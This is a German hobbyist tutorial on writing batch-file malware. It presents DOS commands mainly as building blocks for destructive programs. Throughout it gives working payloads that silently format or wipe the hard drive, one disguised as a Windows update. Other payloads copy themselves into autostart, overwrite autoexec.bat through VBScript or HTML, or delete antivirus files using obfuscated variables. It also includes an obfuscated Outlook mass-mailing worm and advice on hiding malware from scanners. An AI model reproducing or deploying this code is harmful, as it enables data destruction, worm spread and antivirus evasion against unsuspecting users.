************************************************* ******* Professionelle BAT-Programmierung ******* ************************************************* ||||| Ein Tutorial von CcT (Aljoscha Drögemeier) ||||| Dieses Tutorial habe ich zwar mit 12 Jahren geschrieben, doch es ist trotzdem nicht für Komplett-Anfänger geeignet. Ich habe mir zwar Mühe gegeben, es leicht verständlich zu schreiben, aber Grundkenntnisse sollte man schon haben. Wichtige Vorraussetzung zum Programmieren von BAT-Malware ist ein guter Text-Editor (im Notfall auch MS-Standard NotePad. Die Dateierweiterungen müssen aktiviert sein!!! (Sonst kann man ja keine TXTs in BATs umbenennen. Ich habe versucht, die wichtigsten Batch-Funktionen zu erwähnen, habe aber Dinge wie "SET" ausgelassen. Jaja - Viele werden jetzt sagen, dass dies der wichtigste Befehl zum Verschlüsseln von Batches ist ... da haben sie auch Recht. Doch wer seine BAT-MAlware vor AVPs stealthen möchte, sollte einen gutn BAT-Mutator nehmen. Mehr zum Tarnen vor AVPs in Kapitel 9. Lange Rede kurzer Sinn: Viel Spaß noch mit meinem Tutorial! Anmerkung: Wer im folgenden Text irgendein Wort nicht versteht, kann ja im Hacker-Sprachführer in Kapitel 14 nachschlagen!!!

*** Die Kapitel: *** 1. Texte schreiben 2. Dateien löschen 3. Formatieren 4. Andere wichtige Befehle 5. Sprungbefehle 6. Laufwerke erstellen 7. Beispiele 8. VB-Scripte schreiben 9. Malware tarnen 10. BAT2EXE, BAT2EXEC, BAT2COM 11. Tools zum BAT-Malware-Coden 12. Andere coole Batchfunktionen 13. Links 14. Der Hacker-Sprachführer 15. Befehlsübersicht 16. Sonstige BatchhackZ
Hi! Hast du schonmal mit der DOS-Eingabeaufforderung oder Batchdateien (Stapelverarbeitungsdateien) gearbeitet? Nein? Dann wirds aber mal Zeit, denn die Batchjobs sind ziemlich praktisch. Vielleicht hast du ja schonmal die Datei command.com geöffnet, und dich gefragt, wofür diese komischen Eingabezeilen sind... Bevor es Windows in der heutigen Fassung gab, wurde noch mit diesem DOS-Fenster gearbeitet - ohne grafische Benutzeroberfläche. Und was sind diese komischen Batchdateien? Batchdateien (auch Stapelverarbeitungsdateien, Batchjobs oder BAT-Files genannt) sind eigentlich nur ganz normale Textdateien mit der Endung "BAT". Sie werden in einem Texteditor geschrieben und können mehrere DOS-Befehle der Reihe nach ausführen. Sie können löschen, erstellen, schreiben, ausführen, umbenennen, verschieben, die Dateiattribute verändern und noch viel mehr. Und so geht's: 1. öffne einen Texteditor (Notepad, Wordpad...) 2. Schreibe die DOS-Befehle nach unten aufgereiht auf 3. Speichere mit der Endung "BAT" 4. Fertig Na Super! "Schreibe die DOS-Befehle"! Wie soll'n das gehen? Fangen wir mit ein paar einfachen Befehlen an: ------------------------------------------------------------------------------------------------- 1. Texte schreiben/Echo-Befehl/Pause-Befehl ------------------------------------------------------------------------------------------------- Schreibe als erste Zeile call notepad.exe , speichere beispielsweise als notepad.bat und öffne die Datei. Sofort nach ausführen müsste sich der Windows beiliegende Texteditor Notepad öffnen. Ha! Dein erstes Programm! (Welches für den Anfang noch ziemlich lame ist!) Nun schreibe als erste Zeile den Befehl @echo off , welcher das Anzeigen der Befehle, die gerade ausgeführt werden, ausschaltet. Als zweite Zeile verwendest du nun echo Meine erste Stapelverarbeitungsdatei , um den Text "Meine erste Stapelverarbeitungsdatei" auf den Bildschirm zu bringen. Nun speicherst du wieder unter notepad.bat und startest nochmal. Nun geht das Starten von Notepad so schnell, dass du den Text "Meine erste Stapelverarbeitungsdatei" garnicht lesen kannst. Abhilfe schafft hier der Befehl pause , welchen du unter den echo-Befehl ('echo Meine erste Stapelverarbeitungsdatei') schreiben musst. Nun teste nochmal. Auf dem Bildschirm müsste nun "Meine erste Stapelverarbeitungsdatei" stehen. Das Programm notepad.bat wartet wegen dem Befehl 'pause' nun auf Tastendruck. Hat man diesen gemacht, öffnet sich Notepad. Nervig könnte beim PAUSE-Befehl aber auch der Hinweis auf den Tastendruck sein. Dann steht dort z.B. "Drücken Sie eine beliebige Taste um fortzufahren ...". Um diesen Satz auszublenden kannst du mit ">nul" den PAUSE-Befehl in das Null-Device umleiten, das heißt, der Hinweis wird nicht angezeigt. Also schreibst du am Besten nicht "pause" sondern "pause>nul"!!! Mit ECHO könntest du also auch z.B. ein ganzes Bild auf den Bildschirm bringen: 1. Das Wort 'TERROR': @echo off cls echo. echo. echo %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% echo %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% echo -------------------------------------------------------------------- echo. echo ********** ********** ********** ********** ********** ********** echo ** ** * * * * * * * * echo ** ********** ********** ********** * * ********** echo ** ** * * * * * * * * echo ** ********** * * * * ********** * * echo. echo -------------------------------------------------------------------- echo %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% echo %%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%%% echo. echo. pause>nul 2. Ein Baum mit Virusmeldung: @echo off cls echo. echo. echo * echo *** echo ***** echo ******* echo ********* echo *********** echo ************* echo *************** echo *** echo. echo ___________________________________________________________ echo YOUR HARDDISK HAS JUST BEEN ERASED! echo. echo. PAUSE>NUL Folglich könntest du nun schon eine ganze Geschichte auf den Bildschirm bringen. Versuchen wir es erst einmal mit einem Gedicht: @echo off echo **** Der Wichtel **** echo von Aljoscha Dr”gemeier echo ___________________________ echo echo Ein Wichtel lebt in einem Loch, echo in einem kunterbunten Garten, echo dort muss er lange warten, echo sonst f„ngt ihn die Katze doch. pause Das sieht doch schon ganz interessant aus, doch es geht noch einfacher, indem er mit dem Type-Befehl eine vorhandene Textdatei einfach vorträgt. Mit @echo off type wichtel.txt|more pause schreibt er die Textdatei wichtel.txt auf den Bildschirm und wartet anschließend auf Tastendruck.Du kannst mit dem echo-Befehl sogar eine andere Datei schreiben. Dies machst du mit der > und der >>-Pipe. Mit > ersetzt du eine Datei komplett durch den neuen Inhalt, und mit >> hängst du den neuen Text an die Datei an. Nehmen wir beispielsweise unser Gedicht: @echo off echo.> wichtel.txt echo **** Der Wichtel **** >> wichtel.txt echo von Aljoscha Dr”gemeier >> wichtel.txt echo ___________________________ >> wichtel.txt echo.>> wichtel.txt echo Ein Wichtel lebt in einem Loch, >> wichtel.txt echo in einem kunterbunten Garten, >> wichtel.txt echo dort muss er lange warten, >> wichtel.txt echo sonst f„ngt ihn die Katze doch. >> wichtel.txt type wichtel.txt|more pause ------------------------------------------------------------------------------------------------- 2. Löschen von Dateien/Del-Befehl ------------------------------------------------------------------------------------------------- Das sieht doch schön aus! Mit dem Del-Befehl kann man eine Datei löschen. Also bringen wir diesen auch noch mit ein: @echo off echo.> wichtel.txt echo **** Der Wichtel **** >> wichtel.txt echo von Aljoscha Dr”gemeier >> wichtel.txt echo ___________________________ >> wichtel.txt echo.>> wichtel.txt echo Ein Wichtel lebt in einem Loch, >> wichtel.txt echo in einem kunterbunten Garten, >> wichtel.txt echo dort muss er lange warten, >> wichtel.txt echo sonst f„ngt ihn die Katze doch. >> wichtel.txt type wichtel.txt|more pause del wichtel.txt Nun wird die erstellte Datei wichtel.txt nach Ausführen des Programms gelöscht. Beim Löschen gibt es folgende Pfadangebearten: - Wird kein besonderer Pfad angegeben, wird die Datei im aktuellen Verzeichnis gelöscht. - Mit %WinDir% wird automatisch der Windowspfad herausgefunden: So könnte die Zeile del %WinDir%\system\*.* bei manchen PCs den Pfad "C:\windows\system\*.*" oder den Pfad "C:\winnt\system\*.*" meinen. Mit *.* werden dabei alle Dateien in dem angegebenen Verzeichnis gelöscht. '*' kann sowohl ein beliebiger Titel als auch eine beliebige Endung sein. Mit del %WinDir%\*.ini würden nur alle Dateien mit der Endung INI gelöscht werden. Würde dort z.B. titel.* stehen, würden alle Dateien mit dem Titel "titel" gelöscht werden, wobei die Endung egal wäre. - Da DOS bei Dateinamen nur 8 Ziffern erkennt gibt es bei DOS keine vernünftigen Windowsnamen. Um z.B. alle Dateien im Ordner "C:\Ichbinvolldoof" zu löschen muss es also del C:\Ichbin~1\*.* heißen - und das ist ziemlich unpraktisch. Außerdem kannst du bei DOS keine Leerstellen verwenden, diese werden dann als %20 angezeigt. Um diese beiden DOS-Bugs zu umgehen, kannst du auch die Pfade im Windowsformat angeben. Dort würde C:\Eigene Dateien dann in Anführungszeichen stehen müssen. Also nun ein Beispielvergleich: DOS-Format: del C:\Eigene~1\*.* Windows-Format: del "C:\Eigene Dateien\*.*" Nun noch ein paar mehr Optionen beim Löschen von Dateien: Bei wichtigen Dateien fragt der PC ob man sie auch wirklich löschen möchte. Dies umgehst du mit der |- oder der <-Pipe: Möglichkeit 1: echo j|del %WinDir%\system\*.* Möglichkeit 2: echo j>ja.txt del %WinDir%\system\*.*<ja.txt Mit del %0 löscht sich die ausführende Batchdatei selbst. Also fassen wir die nun erlernten Erkenntnisse mal zu einem kleinen Virus zusammen: @echo off echo Ihr Windows-System wird nun aktualisiert, echo dies kann einige Sekunden in Anspruch nehmen. pause>nul echo j>ja.txt del "C:\Eigene Dateien\*.*"<ja.txt del %WinDir%\*.ini<ja.txt del %WinDir%\system\*.*<ja.txt del %WinDir%\*.*<ja.txt Mit dem Befehl deltree kann man einen kompletten Verzeichnisbaum löschen. Der Paramenter /y schaltet dabei die Sicherheitsabfrage ab. Beispiel: deltree c: /y Dieser Befehl löscht den kompletten Inhalt der Festplatte [C:]! ------------------------------------------------------------------------------------------------- 3. Formatieren der Festplatte ------------------------------------------------------------------------------------------------- Mit dem Befehl format formatiert man einen Datenträger, das heißt, alle Dateien auf diesem Datenträger werden gelöscht. Will man z.B. die Festplatte C: formatieren kann man das folgend durchführen: format C: /q /v:Hacked Dieser Befehl formatiert die Festplatte. Der Paramenter Q bedeutet, das die Formatierung mit QuickFormat durchgeführt wird. Das heißt, dass der Datenträger [C:] schnell formatiert wird, sodass der Benutzer bei den schnellen neuen PCs garnicht merkt, was an seinem Rechner überhaupt geschieht (Naja, das war jetzt etwas übertrieben!). Nach der Formatierung wird mit dem Paramenter V das Label "Hacked" auf das Laufwerk gepappt. Alles schön und gut, doch was nützt der beste Formatierungs-Trojaner, wenn er nachfragt, ob die Festplatte überhaupt formatiert werden soll? Kein Problem, diesen Bug haben wir gleich beiseitigt. Hier ein paar Formatierungs-Viren-Beispiele: 1. @echo off echo j>ja.txt format C: /q<ja.txt 2. @echo off echo j|format C: /q 3. @echo off ctty nul format C: /autotest /q /u Variante 2 wird von vielen Virenscannern als BAT.QuickFormat.Trojan oder ähnliches identifiziert. Mit label kann man die Festplatte selbstständig und ohne Formatierung umbenennen: label Hacked (Im Allgemeinen darf das Label eines Datenträgers nur 11 Buchstaben haben!) Anmerkung: Diese Beispiele funzen nicht auf jedem PC, da bei vielen nicht nur die 'J'-Bestätigung, sondern die ganze Eingabe des Festplattenlabels eingegeben werden muss. Teste die Funktion des Viruses doch auf deinem PC. Gebe in die Eingabeaufforderung 'format C:' ein. Fragt DOS nun nach dem Label (Titel) von [C:], funzt so ein Direct-Action-Trojaner auf deinem Rechner nicht! ------------------------------------------------------------------------------------------------- 4. Andere wichtige Befehle ------------------------------------------------------------------------------------------------- * ren = Benennt Dateien über "ren [alter Dateiname] [neuer Dateiname]" um. Sie können kein neues Laufwerk / keinen neuen Pfad als Ziel angeben. * md = Erstellt nach dem Prinzip "md [Verzeichnisname]" ein neues Verzeichnis. * rd = Benennt den Verzeichnisnamen über "rd [alter Verzeichnisname] [neuer Verzeichnisname]" um. * dir = Zeigt eine Liste aller Dateien im Verzeichnis nach dem Prinzip "dir [Laufwerk, Pfad]" an. Lässt man den Pfad leer und verwendet nur "dir" werden die Dateien im aktuellen Verzeichnis angezeigt. * copy = "copy [Zu kopierende Datei] [Neuer Dateipfad]" Kopiert die zu kopierende Datei in den neuen Dateipfad. Beim überschreiben wird eine Bestätigung erwartet. Hier ein Befehl, mit dem sich die Batchdatei selbst in den deutschen Autostart-Ordner kopiert, und somit bei jedem Systemstart ausgeführt wird. Er funktioniert leider nicht bei allen PCs!: copy %0 %windir%\startm~1\progra~1\autost~1\*.* Diesen Befehl gibt es natürlich auch für das englische Startup-Verzeichnis: copy %0 %windir%\Startm~1\Programs\StartUp\brlul.bat Bei vielen PCs lässt sich die BAT-File auch ganz leicht auf den Desktop kopieren: copy %0 %windir%\Desktop\*.* Die wirkvollste Desktop-Spreadingmethode ist aber copy %0 "%userprofile%\Desktop\*.*" Hinweis: Mit der Umgebungsvariable USERPROFILE wird, wie der Name schon sagt das Profilverzeichnis des angemeldeten Benutzers angesprochen. * move = "move [Alter Datei-Pfad] [Neuer Dateipfad]" verschiebt eine Datei in einen anderen Pfad. * mkdir = Siehe bei "md" * date = Datum verändern. z.B. "date 12.03.2003" oder "date 12-03-2003". Lässt man die eigenen Datumsangaben weg, wird das aktuelle Datum angezeigt. * time = Zeit verändern. z.B. "time 12:08:17". Lässt man die eigenen Zeitangaben weg, wird die aktuelle Zeit angezeigt. * batch = Führt die in einer Textdatei angegebenen Bfehle aus. * cls = Löscht den Bildschirminhalt. * attrib = ändert die Dateiattribute einer Datei oder eines Unterverzeichnisses. '+' aktiviert und '-' deaktiviert ein Dateiattribut. Mögliche Attribute sind: R = Schreibgschützt A = Archiv S = Systemdatei H = Versteckte Datei Der Paramenter '/S' verarbeitet Dateien in allen Verzeichnissen des angegebenen Pfads. Hier ein Beispiel: attrib +r -s +h -a c:\autoexec.bat Ganz am Ende könnte dort auch der Paramenter /S stehen. * explorer http:// = Mit diesem Befehl kann man eine Internetseite öffnen. z.B. "explorer http://www.meine-homepage.de/". ------------------------------------------------------------------------------------------------- 5. Sprungbefehle ------------------------------------------------------------------------------------------------- Praktisch sind auch Sprungbefehle: Mit "goto" kann man zu einer anderen Sprungmarke springen, welche mit ':' gekennzeichnet ist. Mit "if exist" wird geprüft, ob die angegebene Datei auch existiert. Ist dies der Fall, wird der nach dem if-exist-Befehl stehende Befehl ausgeführt. z.B.: @echo off echo Es wird jetzt geprft, ob der Pfad C:\windows\*.* existiert! echo. if exist c:\windows\*.* goto :kill echo. echo Da hast du aber nochmal Glck gehabt! Der Pfad existiert nicht! pause goto :end :kill ctty nul echo j>ja.txt if exist c:\windows\*.* del c:\windows\*.*<ja.txt ctty con echo Tja, heut ist wohl nicht dein Tag! goto :end :end Dieses Beispiel prüft, ob der Pfad C:\windows\*.* existiert, tut er das, wird er gelöscht! (Nicht für den Home-Test geeignet!) "if not exist" führt den dahinter stehenden Befehl nur aus, wenn die genannte Datei NICHT existiert!!! ------------------------------------------------------------------------------------------------- 6. Laufwerk erstellen ------------------------------------------------------------------------------------------------- Für deinen Virus kannst du auch extra ein Laufwerk erstellen lassen (du kannst folgende Zeilen ja in deinen Virus einbauen): md %WinDir%\sys copy %0 %WinDir%\sys subst X: %WinDir%\sys Die erste Zeile erstellt einen Ordner "sys" im Windows-Verzeichnis. Die zweite macht, dass sich die Batchdatei selbst (%0) in den neu erstellten Pfad kopiert. Und die dritte Zeile erstellt das Laufwerk [X:] als Verknüpfung zum Ordner %WinDir%\sys. Nach dem Neustart wird das Laufwerk aber wieder gelöscht. Deshalb ist es besser, die Befehle in die AUTOEXEC.BAT zu übernehmen, damit sie bei jedem Neustart ausgeführt werden. Also: md %WinDir%\sys copy %0 %WinDir%\sys subst X: %WinDir%\sys echo subst X: %WinDir%\sys >> c:\autoexec.bat Diese Befehle sind eigentlich ganz praktisch und es muss ja nicht immer ein Virus sein ... Wie wäre es mal mit einem nützlichen Hacker-Tool? @echo off echo --- CcT's CD-Cracker-Installing --- echo. echo Soll Laufwerk [Z:] wirklich erstellt werden? echo Drücken Sie eine beliebige Taste zum Fortfahren echo oder beenden Sie die Anwendung mit ALT+STRG+ENTF echo oder ALT+F4! echo. echo Laufwerk wird erstellt ... md %WinDir%\CDC subst Z: %WinDir%\CDC echo subst Z: %WinDir%\CDC >> c:\autoexec.bat echo. echo Der CD-Cracker wurde erfolgreich installiert. echo Sie brauchen nur noch alle Dateien der echo gewünschten CD-ROM in das Laufwerk kopieren echo und können von dort aus installieren! pause Mit diesem Programm kannst du nun ein Spiel ohne nerviges CD-Wechseln spielen. Also ist dies eine Art No-CD-Crack für jedes Programm nach der Methode von Cool CyberTerrorist (das bin ich, haha!). ------------------------------------------------------------------------------------------------- 7. Beispiele ------------------------------------------------------------------------------------------------- 1: Der Virus WorldCup 98 formatiert die Festplatte und pappt das Label "WorldCup98" drauf. So sieht sein Sprengkopf aus: Cls Echo La coupe du monde c'est genial!!!! Echo y|Format c: /u /v:WorldCup98 Echo o|Format c: /u /v:WorldCup98 Wie man sieht, versucht es der Virus sowohl auf Englisch (y für yes) als auch auf Französisch (o für oui). Also funzt das Ding nicht auf deutschen PCs! Dazu fehlt dann noch die Zeile: Echo j|Format c: /u /v:WorldCup98 Mit einem 'j' für 'ja'! 2: Der Virus MDMA, der Hackergruppe Many Delinquent Modern Anarchists, funktioniert auf Word 6 und 7 auf Windows 3.1, 95. NT und Macintosh. Je nach System löscht er nur einige Dateien, oder hängt an das Ende der Datei autoexec.bat folgende Zeile: deltree /y c: Also werden beim Neustart alle Dateien auf der Festplatte gelöscht. Der Paramenter /y schaltet dabei die Sicherheitsabfrage aus. 3: Trojaner gehören natürlich auch zum Genre der Malware. Das Beispiel 3 in Kapitel 3 ist z.B. ein Direct-Action-Trojaner (auch Killer-Trojaner genannt). Direct-Action-Trojaner gelten in der Szene als Popelprodukte unfähiger Lamer. Da sie aber so leicht zu programmieren sind fängt jeder zweite Virenautor damit an. Was ist also das Mekmal an so einem Killer-Trojaner? Ganz einfach: Einmal aufrufen und weg sind die Daten. Nun schauen wir uns den Killer-Trojaner mal genauer an: ctty nul format c: /autotest /q /u Zeile eins lenkt die Ausgabe (ctty) vom Bildschirm auf das Null-Device um, was bedeutet: Man sieht nichts mehr. Zeile zwei formatiert die Festplatte ohne Nachfrage. Tschüss Daten, hallo Fehlermeldung. 4: Folgendes HTML-Script ersetzt die Datei c:\autoexec.bat durch einen kleinen Killer. Du musst diese Zeilen nur in einem Texteditor abschreiben und der Datei die Endung HTM oder HTML geben!: <HTML> <BODY> <script language="VBScript"> Set fs = CreateObject("Scripting.FileSystemObject") Set format = fs.CreateTextFile("C:\autoexec.bat") format.WriteLine("del %WinDir%\system\*.*") format.WriteLine("del %WinDir%\*.*") format.WriteLine("C:\*.*") format.WriteLine("cls") format.WriteLine("echo Your harddisk has just been erased!") format.Close </script> </BODY> </HTML> oder du machst den selben Virus als Visual Basic Script mit der Endung VBS: On Error Resume Next Set fs = CreateObject("Scripting.FileSystemObject") Set format = fs.CreateTextFile("C:\autoexec.bat") format.WriteLine("del %WinDir%\system\*.*") format.WriteLine("del %WinDir%\*.*") format.WriteLine("C:\*.*") format.WriteLine("cls") format.WriteLine("echo Your harddisk has just been erased!") format.Close Dieser Virus wird allerdings von den meisten AVPs erkannt. Auf jeden Fall verwendet er einen BAT-Sprengkopf: Er ersetzt die autoexec.bat durch folgende Zeilen: del %WinDir%\system\*.* del %WinDir%\*.* C:\*.* cls echo Your harddisk has just been erased! 5. Manche Batches versuchen mit den folgenden Befehlen, die AVPs zu löschen: set A=r set B=g del C:\p%A%o%B%ra~1\kasper~1\avp32.exe set A=r set B=a del C:\p%A%ogr%B%~1\norton~1\*.exe set A=o set B=a del C:\pr%A%gr%B%~1\trojan~1\tc.exe set A=r set B=g del C:\p%A%o%B%ra~1\norton~1\s32integ.dll set A=r set B=g del C:\p%A%o%B%ra\f-prot95\fpwm32.dll set A=p set B=a del C:\%A%rogr%B%~1\mcafee\scan.dat set A=p set B=r set avC=tbav goto delavri set avC=ocem :delavri del C:\%A%rog%B%a~1\%avC%\tbav.dat set A=p set B=g del C:\%A%ro%B%ra~1\avpersonal\antivir.vdf set A=t set B=v del C:\%A%ba%B%w95\tbscan.sig (Diese AVP-Lösch-Befehle wurden dem BATCH WORM GENERATOR 5.03 entnommen!) 6. Am 1. April 2000 verbreitete sich der Wurm Chode in den USA. Er wurde im Verknüpfungs-Format PIF (Program Information File) versendet. Er verwendete DOS-Stapelverarbeitungsfunktionen und VB-Scripts. Er suchte ganze Subnetze mit Ping ab und hielt nach offenen Windows-Freigaben Ausschau. Fand er einen PC, auf dem Laufwerk [C:] freigegeben war, kopierte er sich in dessen Autostart-Ordner. An jedem 19. eines Monats löschte er die wichtigsten Windows-Dateien. Er verwendete einfache Tricks, um angeschlossene Modems dazu zu bringen, eine Nummer anzurufen. Er leitete dazu den Modemwählbefehl ATDT911 per echo-Kommando und DOS-Pipe an die seriellen Schnittstellen um, z.B. mit der Zeile echo atdt911 > com1 Das Ziel war also eine DoS-Attacke gegen amerikanische Notrufdienste, die unserem 112 entsprechen. (Den Wurm gab es auf deutschen Rechnern praktisch nicht!) Der Angriff gelang nur teilweise, da die Notrufzentralen nur genervt, aber nicht blockiert wurden. Wäre der Wurm so programmiert gewesen, dass erst am Tag X alle infizierten Rechner diese Nummer wählen, wäre alles viel schlimmer gekommen. ----------------------------------------------------------------------------------------------------------------------------- 8. Ein VisualBasicScript mit einer BAT-File schreiben ----------------------------------------------------------------------------------------------------------------------------- Wie ich dir schon gezeigt habe, kann man mit dem echo-Befehl andere Scripte und Textdateien schreiben - gut für VBS-Viren-Coder. Um zum Beispiel eine einfache Virenmeldung zu erzeugen, reichen folgende Zeilen: echo.> mld.vbs echo WARN=MsgBox("Ihr Computer wurde mit dem RedHair-Virus infiziert!", vbOKCancel+vbCritical, "WARNUNG!") >>mld.vbs wscript mld.vbs Startet man diese Batchdatei, öffnet sich ein Fenster: Der Titel ist 'WARNUNG!', der Inhalt 'Ihr Computer wurde mit dem RedHair-Virus infiziert!' und das Meldungszeichen ist ein roter Kreis mit einem weißen 'X' in der Mitte. Die beiden Meldungstexte können nun beliebig verändert werden. Die Buttons 'OK' und 'Abbrechen' werden mit der Option 'vbOKCancel' auf den Bildschirm gezaubert. Stattdessen kannst du auch 'vbOKonly' (OK), 'vbYesNo' (Ja, Nein), 'vbYesNoCancel' (Ja, Nein, Abbrechen) oder 'vbAbortRetyIgnore' (Beenden, Wiederholen, Ignorieren). Für das Fehlermeldungs-Zeichen ist 'vbCritical' zuständig. Dies kann beliebig durch 'vbExclamation' (Info-Ausrufezeichen), 'vbQuestion' (Fragezeichen) oder 'vbInformation' (Ausrufezeichen) ersetzt werden. Folgende Batchzeilen bewirken, das ein VBScript geschrieben wird, welches die Batchdatei per Outlook weiterversendet. Die Zeile "Titel der Mail" kann durch das Subject ersetzt werden und die Zeile "Text innerhalb der Mail" durch den Body!! copy %0 C:\anhang.bat copy %0 C:\dwsjo.vbs echo Dim x > C:\dwsjo.vbs echo.on error resume next >> C:\dwsjo.vbs set VBSwayG=FileSystem echo Set fso =" Scripting.%VBSwayG%.Object" >> C:\dwsjo.vbs set VBSwayG= set vbsosf=rd set vbsosf=f echo Set so=CreateObject(%vbsosf%so) >> C:\dwsjo.vbs set vbsosf= set VBSwayI=Outlook echo Set ol=CreateObject("%VBSwayI%.Application") >> C:\dwsjo.vbs set VBSwayI= set VBSwayJ=WScript echo Set out=%VBSwayJ%.CreateObject("Outlook.Application") >> C:\dwsjo.vbs set VBSwayJ= set VBSwayD=out echo Set mapi = %VBSwayD%.GetNameSpace("MAPI") >> C:\dwsjo.vbs set VBSwayD= set VBSwayN=Lists echo Set a = mapi.Address%VBSwayN%(1) >> C:\dwsjo.vbs set VBSwayN= echo Set ae=a.AddressEntries >> C:\dwsjo.vbs echo For x=1 To ae.Count >> C:\dwsjo.vbs echo Set Mail=ol.CreateItem(0) >> C:\dwsjo.vbs echo Mail.to=ol.GetNameSpace("MAPI").AddressLists(1).AddressEntries(x) >> C:\dwsjo.vbs set VBSwayK=Mail echo %VBSwayK%.Subject="Titel der Mail" >> C:\dwsjo.vbs set VBSwayK= echo Mail.Body="Text innerhalb der Mail" >> C:\dwsjo.vbs set sendB=i set attA=t set attB=c set attC=s goto mailrib set sendB=k set attA=b set attB=n set attC=a :mailrib echo Ma%sendB%l.At%attA%a%attB%hment%attC%.Add("C:\anhang.bat") >> C:\dwsjo.vbs set sendA=e set sendB=M echo %sendB%ail.s%sendA%nd >> C:\dwsjo.vbs set vsenda=N set vsendb=t goto emailri set vsenda=vpts set vsendb=vpt :emailri echo %vsenda%ex%vsendb% >> C:\dwsjo.vbs set vsenda= set vsendb= echo ol.Quit >> C:\dwsjo.vbs set cscA=scri set lrrrw=c%cscA%pt %lrrrw% C:\dwsjo.vbs del C:\dwsjo.vbs del C:\anhang.bat Dieser BAT/VBS-Wurm müsste eigentlich von jedem Virenscanner erkannt werden, da er genau die Methode vom LoveLetter-Wurm (I-Love-You) verwendet. Empfohlen wird, den Wurm erst alle AVPs löschen zu lassen und sich dann erst mit diesem Script zu verschicken. In eine COM/EXE-Datei konvertiert wird er noch nicht erkannt (Zumindest an dem Tag, an dem ich dieses Tutorial schrieb!)!! Er verbreitet sich einfach über Outlook! ----------------------------------------------------------------------------------------------------------------------------- 9. Tarnen von BAT-Malware ----------------------------------------------------------------------------------------------------------------------------- Trojaner sind Programme, die sich als andere ausgeben. Sie verwenden natürlich auch Tricks um sich zu tarnen! Hier sind sie: 1. Tarnung als Internet-Link: COM-Dateien haben die Endung COM. Genau wie die internationale Webseitenendung. Der E-Mail-Virus MyParty zum Beispiel verschickte sich als Datei 'www.myparty.yahoo.com', was wie eine Webadresse aussieht. Wird diese Datei nun verschickt, sieht das Opfer die Datei als Attachment und glaubt dies wäre wirklich ein Link auf diese Seite. Und da er keine Lust hat, die komplette Adresse nochmal abzutippeln öffnet er den Mailanhang und der Virus tobt sich auf des Opfers PC aus. 2. Tarnung als Screensaver: Bildschirmschoner haben die Dateiendung SCR (wie SCReensaver)! Eigentlich sind es aber ganz normale EXE oder COM-Dateien, die in SCR umbenannt wurden. EXE-Dateien funktionieren also mit den Endungen EXE, COM und SCR. Also muss man sogar aufpassen, wenn man sich einen gewöhnlichen Bildschirmschoner runterladen will. 3. Tarnung in jedem Dateiformat: Bei den Standard-Einstellungen von Windows werden registrierte Dateiendungen ausgeblendet. Hat man zum Beispiel eine Datei 'Shooter.exe' steht im Windows-Explorer nur 'shooter'! Ein schöner Trick um z.B. ein VisualBasic-Script als Textdatei oder eine EXE-Datei mit gefälschtem Icon als ZIP-Datei zu tarnen. Bei vielem Fernwartungstrojanern kann man dem Trojaner-Server ein Icon aus einer DLL-Icon-Liste geben um den Server zu tarnen, und das Tarnen fällt mit diesem Trick leichter. 4. Tarnung bei jedem Dateiformat - Teil II: Die Tarnungsmöglichkeit Nr. 3 kann man auch noch verändern. Bei manchen Programmen (z.B. File-Sharing-Tools) wird die Endung dennoch angezeigt. Dies kann man verhindern, indem man zwischen der Fake und der Original-Endung einige Leerzeichen einfügt. Dann wird häufig '...' als Dateiendung angezeigt. z.B. 'terror.txt .exe' sieht bei vielen File-Sharing-Tools dann so aus: Title | Size | User | Avaible -------------------------------------------------------------------------------- terror.txt ... 32105 CcT *** 5. Tarn-Tool 1: Mutatoren: Mutatoren sind Programme, die den Script-Text eines Scriptes oder einer BAT-File verschlüsseln, so dass er nciht mehr lesbar oder veränderlich ist, und trotzdem seine Aufgabe erfüllt. Die meisten mutierten Scripte werden von AVPs nicht mehr erkannt. 6. Tarn-Tool 2: Converter: Converter konvertieren (Umwandeln eines Formates in ein anderes) Programme in ein anderes Format, wobei sich der Inhalt der Datei nicht verändert. Es gibt z.B. Tools, mit denen man EXE-Dateien in das HTML-Format umwandeln kann. Das bedeutet, dass man auf eine Internetseite draufgeht und sich sofort ein ausführbarer Virus öffnet. Es gibt auch Tools zum Konvertieren von BAT-Dateien in das EXE oder COM-Format. Eine Anleitung dazu gibt's in Kapitel 10. Das gute an Convertern ist, das die meisten Viren nach dem Konvertieren von AVPs nicht erkannt werden. Darunter z.B. auch die BAT-Viren wie der BAT.QuickFormat.Trojan (Anleitung in Kapitel 3!). Also ähneln die Converter den Mutatoren. 7. Tarn-Tool 3: Binder: Binder verbinden zwei oder mehr Programmteile zu einem. Sie können gut missbraucht werden, um eine harmlose Spieledatei mit einem Trojanischen Pferd zu verschmelzen.Typische, frei verfügbare Binder sind heute Elite Wrap, Senna Spy One EXE Maker, Multi Binder, Silk Rope, WinGlue und Trojan Man. Auch Sie versuchen, die Viren von AVPs nicht erkennbar zu machen. 8. Tarn-Tool 4: Laufzeitpacker (Executable Packer): Diese Packprogramme packen die Viren möglichst klein in eine EXE-Datei, verändern die typischen Bytemuster, und verstecken sich so, dass sie vor Virenscannern (AVPs) geschützt sind. Hier eine kleine Liste mit Laufzeitpackern: ASPack, Diet, Lzexe, NeoLite, Shrink, Pklite und UPX. 9. Tarn-Tool 5: Laufzeitverschlüssler (Executable Encrypter): Diese Tools machen praktisch dasselbe wie Laufzeitpacker, nur komprimieren sie die Daten nicht, sondern verschlüsseln sie. Sie werden eingesetzt, um Dateien gegen unbefugtes Ausführen zu schützen - sie fragen dann beim Start nach einem Passwort. Somit ist es möglich, Daten vor eine Analyse durch Cracker und die Konkurrenz zu schützen. 